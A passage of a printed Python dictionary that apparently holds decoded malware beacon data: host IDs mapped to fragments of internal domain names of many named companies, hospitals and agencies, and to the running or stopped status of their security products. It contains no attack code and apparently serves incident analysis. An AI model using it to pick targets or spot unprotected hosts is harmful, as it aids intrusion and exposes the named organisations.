352 |  '5413978a1df1e232': {0: 'corp.riotinto.'},
353 |  '54b00821991f34d7': {0: 'ADWEAG.L'},
354 |  '54d2ef1d63f8913b': {1: '.uk'},
355 |  '573deb889fc54130': {0: 'amr.corp.intel', 'AV': ['Windows Defender Running']},
356 |  '59135434955f9395': {1: 'cisco.com'},
357 |  '59219a2ddb5b8320': {0: 'fidelitycomm.lo', 1: 'cal', 'AV': []},
358 |  '5988074a4b57329f': {0: 'clinicasierravis', 1: 'ta.org', 'AV': []},
359 |  '59cbe98129c96fe0': {1: 'com'},
360 |  '59e0eb67dce7cf9b': {0: 'WASHOE.W', 1: 'lato', 'AV': []},
361 |  '59f92cf5900dc0b5': {1: 'csa.local'},
362 |  '5a107058a310adea': {1: '7auo7357zllc', 'AV': []},
363 |  '5b22f1738c250f61': {1: '32cptt7'},
364 |  '5b465bfafaf7d840': {1: 'hgvc.com',
365 |                       'AV': ['Windows Defender Running',
366 |                              'CROWDSTRIKE RUNNING']},
367 |  '5b7a361c77573256': {0: 'dmv.state.nv.', 1: 'us', 'AV': []},
368 |  '5b868789218456af': {1: 'mgtsvc.local'},
369 |  '5b94a711d12382c4': {1: 'tu3k'},
370 |  '5c357508714499c5': {1: 'steptoe.com', 'AV': ['CROWDSTRIKE RUNNING']},
371 |  '5c7a3f989c9f56ca': {1: 'xush'},
372 |  '5cca47ff5f7c3a5e': {},
373 |  '5d0297a4574d78f6': {1: 'ia.com'},
374 |  '5d21bc30db5351d0': {1: 'wiley.com'},
375 |  '5d4c6fc27b091f63': {'AV': ['Windows Defender Running']},
376 |  '5d5b20f028f24b16': {0: 'naf.nou-system'},
377 |  '5dade9a43b4d67d4': {1: 'ush.com'},
378 |  '5db010a4dfc2c573': {1: 'bi.corp'},
379 |  '5dd7152045c18ffc': {1: 'innout.corp', 'AV': []},
380 |  '5dec1f2338e285e4': {},
381 |  '5e2d21c201fef1ac': {1: 'nswhealth.net'},
382 |  '5e435e3ed0639974': {1: 'cisco.com', 'AV': []},
383 |  '5ec759b2764d98e9': {1: 'ncs.local'},
384 |  '5f23efbc9c3b1783': {0: 'woodruff-sawyer'},
385 |  '5fcba02b8825c3e2': {0: 'netdecisions.lo'},
386 |  '6004f95951bcaba1': {'AV': []},
387 |  '60401e48ddc2b255': {1: 'sba.gov'},
388 |  '608144765387a7c9': {1: 'molsoncoors.com'},
389 |  '60b4eb967c8e27d9': {1: 'cree.com', 'AV': ['CARBONBLACK RUNNING']},
390 |  '6349bc98a9a3ee87': {1: 'fa.lcl'},
391 |  '6370938ad5638b02': {0: 'int.lukoil-int',
392 |                       1: 'ernational.uz',
393 |                       'AV': ['Windows Defender Running']},
394 |  '6382567d93115c60': {0: 'cds.capilanou.'},
395 |  '63ef183de008e4ed': {0: 'tr.technion.ac', 1: '.il', 'AV': []},
396 |  '648c9efa25228f40': {1: 'ah.org'},
397 |  '6505d2380cf7f1fd': {1: 'bisco.int'},
398 |  '65404b01fe63dc00': {1: 'phabahamas.org'},
399 |  '6573781cf7eefc92': {1: 'ciena.com'},
400 |  '657ce5de7ff0c77a': {1: 'banccentral.com'},
401 |  '659228e7dece3704': {},
402 |  '65d1e2bf579c7642': {1: 'bk.local', 'AV': []},
403 |  '66f6a2c04133aa46': {1: 's.com',
404 |                       'AV': ['Windows Defender Running',
405 |                              'WINDOWS DEFENDER STOPPED',
406 |                              'CARBONBLACK RUNNING',
407 |                              'CarbonBlack STOPPED']},
408 |  '6776bab682780615': {1: 'htwanmgmt.local'},
409 |  '6776c1c2c729f869': {1: 'ciena.com'},
410 |  '67cfc634d1fb5ef2': {'AV': ['ESET RUNNING', 'ESET STOPPED']},
411 |  '68d916857ef81c28': {},
412 |  '69258b3b854fd5b9': {0: 'i9xz'},
413 |  '69cda81f72bf4f15': {'AV': ['CROWDSTRIKE RUNNING']},
414 |  '6a6b0d9fa3459aa4': {0: 'servitia.intern', 'AV': []},
415 |  '6ab1902364547743': {0: 'HQ.REOTr', 1: '-wwgi2xnl', 'AV': []},
416 |  '6ad50d09cc213fe2': {'AV': ['Windows Defender Running',
417 |                              'WINDOWS DEFENDER STOPPED',
418 |                              'CARBONBLACK RUNNING',
419 |                              'CROWDSTRIKE RUNNING',
420 |                              'CROWDSTRIKE STOPPED',
421 |                              'FSECURE RUNNING']},
422 |  '6b740b9519fcab6b': {1: 'btb.az'},
423 |  '6bb5ae277d6beeca': {1: 'm'},
424 |  '6c432a8bc7afb00b': {'AV': ['Windows Defender Running',
425 |                              'WINDOWS DEFENDER STOPPED',
426 |                              'MS DEFENDER ID STOPPED',
427 |                              'CARBONBLACK RUNNING',
428 |                              'CROWDSTRIKE RUNNING',
429 |                              'CROWDSTRIKE STOPPED',
430 |                              'ESET STOPPED',
431 |                              'FSECURE RUNNING']},
432 |  '6c7fa5ec3e98f487': {'AV': ['Windows Defender Running',
433 |                              'WINDOWS DEFENDER STOPPED',
434 |                              'CARBONBLACK RUNNING',
435 |                              'CROWDSTRIKE RUNNING',
436 |                              'CROWDSTRIKE STOPPED',
437 |                              'FSECURE RUNNING']},
438 |  '6c85958a40a439c4': {},
439 |  '6c86cbadbc4bb18e': {},
440 |  '6c9be01c00231a2b': {1: 'six7etp'},
441 |  '6d21c4e01c5808a1': {1: 'm',
442 |                       'AV': ['Windows Defender Running',
443 |                              'CROWDSTRIKE RUNNING']},
444 |  '6dbddee40aa308ca': {1: 'net.vestfor.dk', 'AV': []},
445 |  '6e5bc8adf9cbafc2': {0: 'digitalsense.co'},
446 |  '6f924bfe817ef591': {1: 'paloverde.local',
447 |                       'AV': ['Windows Defender Running']},
448 |  '70176844a5e867db': {'AV': []},
449 |  '702cd8f24eff252e': {1: 'switchnet.nv'},
450 |  '7086e2f4dc570279': {'AV': ['Windows Defender Running']},
451 |  '70dee5c062cfee53': {0: 'ccscurriculum.c',
452 |                       'AV': ['ESET RUNNING', 'ESET STOPPED']},
453 |  '70ee2eb72fd87285': {'AV': ['Windows Defender Running',
454 |                              'WINDOWS DEFENDER STOPPED',
455 |                              'WINDOWS DEFENDER ATP STOPPED',
456 |                              'MS DEFENDER ID STOPPED',
457 |                              'CARBONBLACK RUNNING',
458 |                              'CROWDSTRIKE STOPPED',
459 |                              'FIREEYE RUNNING',
460 |                              'FIREYE STOPPED',
461 |                              'ESET STOPPED',
462 |                              'FSECURE STOPPED']},
463 |  '71d5d1f9b0de9ac7': {1: 'MOG.COM'},
464 |  '71f011110378b1ef': {2: 'ns5oudm'},
465 |  '722d4e42629a9411': {0: 'ARYZTA.C',
466 |                       1: 'nf',
467 |                       'AV': ['Windows Defender Running']},
468 |  '728fdd642e720863': {1: 'KS.LOCAL'},
469 |  '72e2d872130a33f8': {1: 'calsb.org', 'AV': []},
470 |  '72f6a74ce18a53dd': {0: 'FSAR.LOC', 1: '7f', 'AV': []},
471 |  '7347596face09f85': {0: 'COTESTDE'},
472 |  '737e4347713c9902': {1: 'scif.com'},
473 |  '73f16a071de76292': {0: 'orient-express', 1: '.com', 'AV': []},
474 |  '742360f18bd7c7d1': {1: 'cosgroves.local'},
475 |  '7435c77366594bc8': {1: 'atg.local', 'AV': ['ESET RUNNING', 'ESET STOPPED']},
476 |  '743e261191b02261': {0: 'Aerial.l'},
477 |  '7549899bd37ba658': {1: 'apu.mn'},
478 |  '76330b4d49bf7ec4': {0: 'LABELMAR',
479 |                       1: 'nde5gaefm',
480 |                       'AV': ['ESET RUNNING', 'ESET STOPPED']},
481 |  '7646229b5cf66fbd': {0: 'viam-invenient'},
482 |  '76ceca194d7c3337': {'AV': ['Windows Defender Running',
483 |                              'WINDOWS DEFENDER ATP RUNNING',
484 |                              'WINDOWS DEFENDER ATP STOPPED',
485 |                              'MS DEFENDER ID STOPPED',
486 |                              'CROWDSTRIKE RUNNING',
487 |                              'FIREYE STOPPED',
488 |                              'ESET RUNNING',
489 |                              'ESET STOPPED',
490 |                              'FSECURE RUNNING']},
491 |  '76de4bc68f4b1f74': {0: 'dhhs-ad.'},
492 |  '76f994f37001d130': {0: 'premiersight.fa',
493 |                       1: 'rm',
494 |                       'AV': ['Windows Defender Running']},
495 |  '77ff1196f3432627': {0: 'CIMBMY.C', 1: 'zllc', 'AV': []},
496 |  '78165ce79c943a82': {},
497 |  '789786d236594525': {0: 'ksei'},
498 |  '78ab9d213eac441b': {1: 'tdc.internal'},
499 |  '78bb1fa39b4b24e3': {0: 'europapier.inte', 1: 'rnal'},
500 |  '78e92f593ddfd23b': {1: 'osb.local'},
501 |  '79225c349944dee6': {0: 'SamuelMe', 1: '_kfczdhxejtgzy', 'AV': []},
502 |  '79d288ea4c16e521': {},
503 |  '7a271a633bb24608': {'AV': []},
504 |  '7bbbc70eb3436db6': {2: 'pekj7g3'},
505 |  '7d2022b64938e644': {'AV': ['ESET RUNNING', 'ESET STOPPED']},
506 |  '7d20c0a855cb89eb': {1: 'publiser.it'},
507 |  '7d587b9ca84d6755': {'AV': ['Windows Defender Running']},
508 |  '7db80bb12dd97a44': {2: 'y3b5ct3'},
509 |  '7e000d05d231151d': {1: 'vsp.com', 'AV': ['Windows Defender Running']},
510 |  '7e26c280f46be2c2': {0: 'grupobazar.loca',
511 |                       'AV': ['ESET RUNNING', 'ESET STOPPED']},
512 |  '7e42c5bdbc34fc91': {0: 'mnh.rg-law.ac', 1: '.il'},
513 |  '8051b60d24659417': {1: 'ch2news.tv', 'AV': []},
514 |  '81109da5ff456c1c': {1: 'fmtn.ad', 'AV': ['Windows Defender Running']},
515 |  '818e65d909081cd4': {1: 'ingo.kg'},
516 |  '81cea9aa6e6b92e3': {},
517 |  '820d29d0dc45a323': {1: 'huno'},
518 |  '823a6ba47340e07b': {0: 'its.iastate.ed'},
519 |  '824fe66fdb1332ac': {1: 'fa.lcl'},
520 |  '8271a1036c56129b': {1: 'xdxinc.net',
521 |                       'AV': ['Windows Defender Running',
522 |                              'CROWDSTRIKE RUNNING',
523 |                              'CROWDSTRIKE STOPPED']},
524 |  '828c78fd8f500e00': {'AV': ['Windows Defender Running',
525 |                              'WINDOWS DEFENDER STOPPED',
526 |                              'WINDOWS DEFENDER ATP STOPPED',
527 |                              'MS DEFENDER ID RUNNING',
528 |                              'MS DEFENDER ID STOPPED',
529 |                              'CARBONBLACK RUNNING',
530 |                              'CarbonBlack STOPPED',
531 |                              'CROWDSTRIKE RUNNING',
532 |                              'CROWDSTRIKE STOPPED',
533 |                              'FIREYE STOPPED',
534 |                              'ESET RUNNING',
535 |                              'ESET STOPPED',
536 |                              'FSECURE RUNNING',
537 |                              'FSECURE STOPPED']},
538 |  '82f9e67abe8fc5ee': {0: 'WASHOE.W'},
539 |  '831dba83ced9c7d4': {1: 'uont.com', 'AV': ['Windows Defender Running']},
540 |  '837b75f2cd46ff6b': {0: 'zippertubing.co',
541 |                       1: 'm',
542 |                       'AV': ['ESET RUNNING', 'ESET STOPPED']},
543 |  '843ce48fccb916ac': {'AV': []},
544 |  '8523bd6189b707b0': {0: 'fisherbartoninc'},
545 |  '85faf1a4632f7719': {0: 'SF-Libra'},
546 |  '86113032551bfe60': {0: 'ab2z'},
547 |  '871a74657e9886aa': {0: 'ad.azarthritis',
548 |                       1: '.com',
549 |                       'AV': ['Windows Defender Running']},
550 |  '889ba508a0fc0a16': {'AV': ['Windows Defender Running']},
551 |  '88b712a616036208': {'AV': []},
552 |  '88cdb1ec94131b62': {0: 'TBKTeam.'},
553 |  '891e43b7399f6b10': {'AV': ['CARBONBLACK RUNNING']},
554 |  '8967b484b166f84a': {1: 'org', 'AV': ['FIREEYE RUNNING']},
555 |  '89ca7d2e61c36f35': {},
556 |  '8ad63316a78e73f6': {'AV': []},
557 |  '8b01a30c3c63f70a': {0: '2sin'},
558 |  '8b5800dcfb81cf6a': {1: '7auo7357zllc'},
559 |  '8bcfa642ab293d8e': {'AV': ['Windows Defender Running',
560 |                              'CARBONBLACK RUNNING']},
561 |  '8c828a6a81140911': {'AV': []},
562 |  '8c8475178cbd3415': {0: 'xs95'},
563 |  '8caaf7ad5bfcc842': {1: 'chc.dom'},
564 |  '8d3b008a2532d350': {1: 'bok.com', 'AV': ['CROWDSTRIKE RUNNING']},
565 |  '8eed6b5d3770f144': {'AV': ['Windows Defender Running',
566 |                              'CROWDSTRIKE RUNNING']},
567 |  '8f5654fb836b1cad': {1: 'corp.ptci.com', 'AV': []},
568 |  '8f9e1a8043e1b5fb': {1: 'nswhealth.net'},
569 |  '8fc146f8a376bf6a': {0: 'LABELMAR', 1: 'nde5gaefm'},
570 |  '8fd80783737ae9cb': {0: 'neophotonics.co',
571 |                       'AV': ['Windows Defender Running']},
572 |  '90352a31fc43f531': {'AV': ['Windows Defender Running']},
573 |  '903fa1c857554557': {1: 'usd373.org'},
574 |  '914c254879463bda': {1: 'gksm.local', 'AV': ['Windows Defender Running']},
575 |  '91b62b48db95e2eb': {1: '72apttm'},
576 |  '91cc9e7fda58b1bc': {},
577 |  '91ce43e71a9fdadc': {1: 'corp.ncr.com',
578 |                       'AV': ['CARBONBLACK RUNNING', 'CarbonBlack STOPPED']},
579 |  '91f584da7ac7245e': {0: 'kocholding.loca'},
580 |  '9255fc382b6ec2f4': {1: 'parentpay.local',
581 |                       'AV': ['Windows Defender Running',
582 |                              'WINDOWS DEFENDER STOPPED']},
583 |  '92cfb39fa70af6c5': {0: 'RCWFacto', 1: '_9kmqs27ujjc', 'AV': []},
584 |  '9320d3fa1def5ae5': {0: 'its.iastate.ed'},
585 |  '936f78ab73aa3022': {0: 'ggsg-us.cisco'},
586 |  '937202acb56005c1': {0: 'internal.hws.o'},
587 |  '94de352fa453fab3': {0: 'SPS.stra',
588 |                       1: '_cqqri',
589 |                       'AV': ['Windows Defender Running']},
590 |  '95528f430ed31c30': {'AV': ['Windows Defender Running']},
591 |  '95610d78b6823138': {1: 'camcity.local'},
592 |  '9580288407f25a63': {1: 'ironform.com', 'AV': []},
593 |  '95920d33a625d254': {0: 'thecheesecakefac'},
594 |  '96b5c94540e2d3e7': {'AV': ['Windows Defender Running',
595 |                              'WINDOWS DEFENDER STOPPED',
596 |                              'MS DEFENDER ID STOPPED',
597 |                              'CARBONBLACK RUNNING',
598 |                              'CROWDSTRIKE RUNNING',
599 |                              'CROWDSTRIKE STOPPED',
600 |                              'ESET STOPPED',
601 |                              'FSECURE RUNNING']},
602 |  '96c356fd4f7e4d53': {1: 'dotcomm.org', 'AV': []},
603 |  '96e23483767c9506': {0: 'rst.atlantis-p', 1: 'ak.ru', 'AV': []},
604 |  '97121ea47fc4585a': {1: 'gksm.local', 'AV': ['Windows Defender Running']},
605 |  '97ad321adb3d5fd2': {0: 'us.deloitte.co'},
606 |  '97cfa9c47ac55866': {},
607 |  '982bc0553b152b3b': {0: 'ghw9'},
608 |  '9921c3e1385d8c94': {'AV': ['Windows Defender Running']},
609 |  '993c6be2881c585c': {1: 'deltads.ent', 'AV': ['CARBONBLACK RUNNING']},
610 |  '9a669b241b07611b': {1: 'bgeltd.com'},
611 |  '9acc3a3067dc7fd5': {1: 'ripta.com',
612 |                       'AV': ['Windows Defender Running',
613 |                              'ESET RUNNING',
614 |                              'ESET STOPPED']},
615 |  '9ae2b8577c5086b3': {1: 'weioffice.com', 'AV': []},
616 |  '9bd9b66056806cf7': {'AV': ['Windows Defender Running',
617 |                              'CROWDSTRIKE RUNNING',
618 |                              'CROWDSTRIKE STOPPED']},
619 |  '9cfd91f71bf86d7c': {1: 'intensive.int', 'AV': []},
620 |  '9dbb21de9da3a469': {0: 'signaturebank.l', 1: 'ocal'},
621 |  '9dcb592018be2b9c': {'AV': []},
622 |  '9dd67c41309cfc36': {1: 'acmedctr.ad', 'AV': ['Windows Defender Running']},
623 |  '9dd993478a4b254d': {1: 'com'},
624 |  '9dfcccb422a3b9ee': {1: 'uis.kent.edu', 'AV': ['Windows Defender Running']},
625 |  '9e16f6f0a89317a3': {0: 'vantagedatacente',
626 |                       1: 'rs.local',
627 |                       'AV': ['Windows Defender Running']},
628 |  '9e74cb03e45b1ae2': {1: 'uis.kent.edu', 'AV': ['Windows Defender Running']},
629 |  '9ea672107bcb6d05': {1: 'ujjc'},
630 |  '9f357d2b735f23a9': {2: 'fhlj'},
631 |  '9f623049330e5b03': {1: 'kcpl.com'},
632 |  'a083a365dd58399e': {0: 'ghsmain1.ggh.g', 'AV': []},
633 |  'a0e1145c47cc900b': {1: 'm'},
634 |  'a0ea674fd5fe8bac': {1: 'mti.local', 'AV': ['ESET RUNNING', 'ESET STOPPED']},
635 |  'a10a98908c3a4be1': {0: 'BE.AJINO', 1: 'ndl5gotom', 'AV': []},
636 |  'a19885f3f08e319d': {1: 'nswhealth.net'},
637 |  'a1e9966fd9220bde': {1: 'nacr.com'},
638 |  'a20ce3758a60b8a7': {},
639 |  'a2c197a70265faac': {0: 'vms.ad.varian'},
640 |  'a4335b2ad02e8c7f': {'AV': ['Windows Defender Running',
641 |                              'ESET RUNNING',
642 |                              'ESET STOPPED']},
643 |  'a4f92b52939e9edb': {'AV': ['Windows Defender Running',
644 |                              'WINDOWS DEFENDER STOPPED',
645 |                              'FIREEYE RUNNING']},
646 |  'a57c80cddb8be9ad': {1: 'bhq.lan'},
647 |  'a6ce1410ee7046c6': {1: 'bi.corp'},
648 |  'a703c19802121ee6': {0: 'internal.jtl.c'},
649 |  'a8533a1b53d5083a': {0: 'TYLERTEC'},
650 |  'a87de4197ac94b6f': {0: 'workdayinternal'},
651 |  'a957f60717bb884b': {0: 'ninewellshospita'},
652 |  'a9a9db1865ce1bcd': {1: 'mej7'},
653 |  'a9c79b05fa1ec47a': {'AV': ['Windows Defender Running',
654 |                              'WINDOWS DEFENDER STOPPED',
655 |                              'ESET RUNNING',
656 |                              'ESET STOPPED']},
657 |  'aa415cd3bf0ffa08': {1: 'resprod.com', 'AV': ['Windows Defender Running']},
658 |  'aa53764c15581a1a': {1: 'pageaz.gov', 'AV': ['Windows Defender Running']},
659 |  'aa695537ee274b91': {0: 'County.S',
660 |                       1: '7lmwqsixja9cqy',
661 |                       'AV': ['Windows Defender Running']},
662 |  'aaeeb8eaf6fbe6a1': {0: 'amr.corp.intel'},
663 |  'ab55a01d54c4c9e5': {1: 'epl.com', 'AV': ['Windows Defender Running']},
664 |  'ab902a323b541775': {0: 'mountsinai.hosp', 1: 'ital', 'AV': []},
665 |  'abf22ef00a58957f': {0: 'dokkenengineerin'},
666 |  'ac98e5727cf8f131': {0: 'Apelsin.', 1: 'zlcg88i'},
667 |  'acc6e98bf35a559b': {'AV': ['Windows Defender Running']},
668 |  'ad19512a616c0dd9': {1: 'nvidia.com'},
669 |  'ad3404b0f97ae41b': {'AV': ['Windows Defender Running',
670 |                              'WINDOWS DEFENDER STOPPED']},
671 |  'ad867badf6f27a97': {'AV': ['Windows Defender Running',
672 |                              'ESET RUNNING',
673 |                              'ESET STOPPED']},
674 |  'ae2e43d1a26715be': {0: 'ftsillapachecasi',
675 |                       'AV': ['Windows Defender Running']},
676 |  'ae38417e35599051': {0: 'magnoliaisd.loc'},
677 |  'af5152ea500d8568': {'AV': ['FIREEYE RUNNING', 'FIREYE STOPPED']},
678 |  'afa0a0f592f44cbe': {0: 'ABLE.loc',
679 |                       1: '7l',
680 |                       'AV': ['Windows Defender Running']},
681 |  'afb5b6d3337c8448': {0: 'LOGOSTEC', 1: '_ka7du', 'AV': []},
682 |  'afe62f81924f050c': {'AV': ['Windows Defender Running',
683 |                              'ESET RUNNING',
684 |                              'ESET STOPPED']},
685 |  'b0f6d1adc90979a9': {'AV': ['Windows Defender Running',
686 |                              'WINDOWS DEFENDER STOPPED',
687 |                              'MS DEFENDER ID STOPPED',
688 |                              'CARBONBLACK RUNNING',
689 |                              'CROWDSTRIKE RUNNING',
690 |                              'CROWDSTRIKE STOPPED',
691 |                              'ESET STOPPED',
692 |                              'FSECURE RUNNING']},
693 |  'b19847862f468200': {1: 'FWO.IT'},
694 |  'b1c875b794e42bd5': {0: 'e-idsolutions.'},
695 |  'b211fbfb6271efb8': {1: 'm2npttl'},
696 |  'b29da236a29e87c3': {1: 'siskiyous.edu', 'AV': ['Windows Defender Running']},
697 |  'b2ade73de642ba75': {'AV': ['Windows Defender Running']},
698 |  'b2dbd139723eb86b': {1: 'sc.pima.gov', 'AV': []},
699 |  'b301ea426452b8e1': {'AV': ['Windows Defender Running',
700 |                              'WINDOWS DEFENDER STOPPED',
701 |                              'CARBONBLACK RUNNING',
702 |                              'CROWDSTRIKE RUNNING',
703 |                              'CROWDSTRIKE STOPPED',
704 |                              'FSECURE RUNNING']},
705 |  'b34769b5be5d5b73': {0: 'BCC.loca'},
706 |  'b36b5de63deadefc': {0: 'workdayinternal'},
707 |  'b5da0c4e1bf08075': {},
708 |  'b6a14f0681ed89dd': {1: 'inf.dc.net', 'AV': ['CROWDSTRIKE RUNNING']},
709 |  'b6fbbc6be7ded0bb': {'AV': ['Windows Defender Running']},
710 |  'b723daf77955804e': {0: 'staff.technion', 1: '.ac.il'},
711 |  'b73a7ad5778bfda2': {1: 'coxnet.cox.com', 'AV': ['Windows Defender Running']},
712 |  'b761cff8201fb37a': {1: 'superior.local'},
713 |  'b7bdd4742a25753c': {1: '7auo7357zllc'},
714 |  'b881129a589d6f3b': {1: 'parametrix.com', 'AV': ['Windows Defender Running']},
715 |  'b93ca39df3e5879d': {0: 'vms.ad.varian', 1: '.com'},
716 |  'b956e216974a17ed': {'AV': []},
717 |  'b95bd07ee0b8dccd': {1: 'fncm'},
718 |  'ba55e115944914ee': {},
719 |  'ba7747087f265c1d': {'AV': ['Windows Defender Running']},
720 |  'bb086814634e9492': {'AV': ['Windows Defender Running',
721 |                              'WINDOWS DEFENDER STOPPED',
722 |                              'MS DEFENDER ID STOPPED',
723 |                              'CROWDSTRIKE RUNNING',
724 |                              'CROWDSTRIKE STOPPED',
725 |                              'ESET STOPPED']},
726 |  'bb2e5930574407b2': {2: 'txmt'},
727 |  'bc1cb013239b4b92': {},
728 |  'bcd5425c640d3bcf': {1: 'ap.serco.com'},
729 |  'bd20e7f9f38e2b95': {2: 'qish'},
730 |  'bd6defbbe9fea3a9': {0: 'ad001.mtk.lo'},
731 |  'bdaefbb17fc2b08d': {1: 'uk', 'AV': []},
732 |  'bdd1a515d59134a0': {0: 'prod.hamilton.'},
733 |  'bebc88c5d4dff7b8': {'AV': []},
734 |  'befb74360efa532f': {1: 'insead.org'},
735 |  'bf193b78fb94adf4': {},
736 |  'bf33b6558a00701d': {1: 'local'},
737 |  'bf5cf2290400ed00': {},
738 |  'c0bc6b619ef4e192': {'AV': []},
739 |  'c164000c6e5e956e': {0: 'admin.callidusc', 'AV': []},
740 |  'c220e2538e73c161': {0: 'med.ds.osd.mi'},
741 |  'c276a41f46ca93ae': {'AV': ['Windows Defender Running',
742 |                              'CROWDSTRIKE RUNNING',
743 |                              'FIREEYE RUNNING',
744 |                              'FIREYE STOPPED',
745 |                              'ESET STOPPED',
746 |                              'FSECURE STOPPED']},
747 |  'c2ad0b2b1fd9c5d1': {'AV': ['Windows Defender Running',
748 |                              'WINDOWS DEFENDER STOPPED']},
749 |  'c2ea5e77a970660a': {1: '_9kfrdxqm'},
750 |  'c34fb45f6e26be00': {'AV': ['Windows Defender Running']},
751 |  'c38106ef39f3321d': {0: 'mutualofomahaban',
752 |                       1: 'k.com',
753 |                       'AV': ['CROWDSTRIKE RUNNING', 'FIREEYE RUNNING']},
754 |  'c3fb7eafb56fca8a': {1: 'itps.uk.net'},
755 |  'c54c96d133128256': {1: 'mmhs-fla.org'},
756 |  'c57a1108afc9ec4c': {1: 'bcofsa.com.ar',
757 |                       'AV': ['Windows Defender Running',
758 |                              'ESET RUNNING',
759 |                              'ESET STOPPED']},
760 |  'c57bf35ffde4c814': {'AV': ['CROWDSTRIKE RUNNING']},
761 |  'c5d46f6a6af35102': {1: 'us.dominos.com', 'AV': ['Windows Defender Running']},
762 |  'c607ebe0c6ccd4ee': {1: 'securview.local',
763 |                       'AV': ['Windows Defender Running']},
764 |  'c62f348c565b4881': {},
765 |  'c6517c954e622dc2': {0: 'corp.stingraydi'},
766 |  'c681c2974827fc10': {1: 'ax37et'},
767 |  'c6d1d331a6904ba2': {1: 'tv2.local', 'AV': ['Windows Defender Running']},
768 |  'c6d2c43488a43360': {1: 'uncity.dk', 'AV': ['Windows Defender Running']},
769 |  'c70c92949b61115b': {0: 'cs.haystax.loc', 1: 'al', 'AV': []},
770 |  'c7b3db0a9f8d908e': {},
771 |  'c8f54ac04e828f6f': {1: 'bok.com'},
772 |  'c945647c545926ee': {0: 'deniz.denizbank'},
773 |  'ca0066cbc0f13b65': {},
774 |  'ca3a7ff8971ccda8': {1: 'nvidia.com',
775 |                       'AV': ['Windows Defender Running', 'FIREEYE RUNNING']},
776 |  'ca6f2882732f58f8': {1: 'nvidia.com',
777 |                       'AV': ['Windows Defender Running',
778 |                              'WINDOWS DEFENDER STOPPED',
779 |                              'FIREEYE RUNNING',
780 |                              'FIREYE STOPPED']},
781 |  'ca7d468f9242eb3c': {0: 'fortsmithlibrary', 1: '.org', 'AV': []},
782 |  'cb038a4bd6b32e09': {0: 'voceracommunicat',
783 |                       1: 'ions.com',
784 |                       'AV': ['Windows Defender Running']},
785 |  'cb28867a08967b43': {'AV': []},
786 |  'cb34c4ebcb12af88': {0: 'DPCITY.I',
787 |                       1: '7a',
788 |                       'AV': ['ESET RUNNING', 'ESET STOPPED']},
789 |  'cb3b9da0dd09e32b': {1: 'ansc.gob.pe'},
790 |  'cb3cbf8cd2ce24c0': {1: 'swd.local', 'AV': ['Windows Defender Running']},
791 |  'cb7514b4bf224bdf': {'AV': ['ESET RUNNING', 'ESET STOPPED']},
792 |  'cb8f970504b7725c': {0: 'allegronet.co.'},
793 |  'cb97d8c94860e07a': {},
794 |  'cc46dd98c57d06ae': {},
795 |  'cc5169b4c06079ea': {0: 'weber-kunststof'},
796 |  'cc7604a54197348b': {1: 'bi.corp'},
797 |  'ccb19334a6d32daa': {0: 'Sunkistg',
798 |                       1: '-lxg.x.ucqqri',
799 |                       'AV': ['Windows Defender Running',
800 |                              'ESET RUNNING',
801 |                              'ESET STOPPED']},
802 |  'ccd967d017ecf9a3': {0: 'ced-concord.co', 1: 'm', 'AV': []},
803 |  'cd73c718dc4d7078': {'AV': ['Windows Defender Running']},
804 |  'cdcc93b50477f52f': {0: 'BrokenAr',
805 |                       1: '-lxwg8exljmcqy',
806 |                       'AV': ['Windows Defender Running']},
807 |  'ce024656c06a6eed': {1: 'escap.org'},
808 |  'ce5b6fdef4bb335f': {1: 'ocal'},
809 |  'cf611b275b81685b': {0: 'ETC1.loc', 1: '7l'},
810 |  'd0795ddf1fa35202': {0: 'newdirections.k', 1: 'c'},
811 |  'd102ea358620821c': {'AV': ['Windows Defender Running',
812 |                              'WINDOWS DEFENDER STOPPED',
813 |                              'CARBONBLACK RUNNING',
814 |                              'CarbonBlack STOPPED']},
815 |  'd1f6774271a94ee9': {2: '2tdl7g8'},
816 |  'd23caa9eddc5297f': {0: 'FVF.loca', 1: 'm', 'AV': []},
817 |  'd2a96172bc11f012': {0: 'friendshipstateb', 1: 'ank.com', 'AV': []},
818 |  'd2f63a1228c683f7': {1: 'repsrv.com'},
819 |  'd322313c3f486fbe': {1: 'ki5s'},
820 |  'd3bd724ce330bdd0': {'AV': ['Windows Defender Running',
821 |                              'WINDOWS DEFENDER STOPPED',
822 |                              'WINDOWS DEFENDER ATP STOPPED',
823 |                              'MS DEFENDER ID STOPPED',
824 |                              'CARBONBLACK RUNNING',
825 |                              'CROWDSTRIKE RUNNING',
826 |                              'CROWDSTRIKE STOPPED',
827 |                              'ESET RUNNING',
828 |                              'ESET STOPPED']},
829 |  'd4a28bc0602e9c43': {1: 'ah.org'},
830 |  'd56e78a26c50c16a': {0: 'digitalreachinc',
831 |                       1: '.com',
832 |                       'AV': ['Windows Defender Running']},
833 |  'd6479c130f720dd9': {1: 'ncpa.loc',
834 |                       'AV': ['Windows Defender Running',
835 |                              'ESET RUNNING',
836 |                              'ESET STOPPED']},
837 |  'd700f3846b6e0e5c': {},
838 |  'd71451913218fc04': {'AV': ['Windows Defender Running']},
839 |  'd7216a169a45dc55': {1: 'LPSL.com', 'AV': ['Windows Defender Running']},
840 |  'd8e2a06fbf2c8a3e': {1: 'moncton.loc', 'AV': ['Windows Defender Running']},
841 |  'd993395666da725c': {1: 'molsoncoors.com'},
842 |  'd9aac81b2af0a4bc': {1: 'jarvis.lab', 'AV': ['Windows Defender Running']},
843 |  'd9ef8cdc3a72f7fa': {0: 'MOC.loca', 1: 'm', 'AV': []},
844 |  'db1817b81f4d9aa8': {1: 'airquality.org'},
845 |  'db7de5b93573a3f7': {1: 'coxnet.cox.com', 'AV': ['Windows Defender Running']},
846 |  'db9cff235cde74be': {1: 'zh5d'},
847 |  'dc2f33cc00760afe': {0: 'fujitsugeneral.', 1: 'com.au', 'AV': []},
848 |  'dc9a426004ffceda': {'AV': ['Windows Defender Running']},
849 |  'dd3a3bcc24645417': {1: '.com'},
850 |  'dddddddddddddddd': {2: 'djctsh8byjmiz8ced-concord.co'},
851 |  'de3545f503ca6df3': {0: 'milledgeville.l', 1: 'ocal'},
852 |  'dea857191eb3ec36': {0: 'aac.dva.va.go'},
853 |  'defd7ae570c4f890': {2: 'y3mo'},
854 |  'df12b51c69ff6609': {1: 'coxnet.cox.com'},
855 |  'dfd995cf9cae35a1': {0: 'ADLENG.l'},
856 |  'e0f3bfe2ba2b0a37': {'AV': ['Windows Defender Running']},
857 |  'e1c91668458b8297': {'AV': ['Windows Defender Running',
858 |                              'CROWDSTRIKE RUNNING']},
859 |  'e2535b8a9d4d64ee': {1: 'cys.local', 'AV': []},
860 |  'e258332529826721': {},
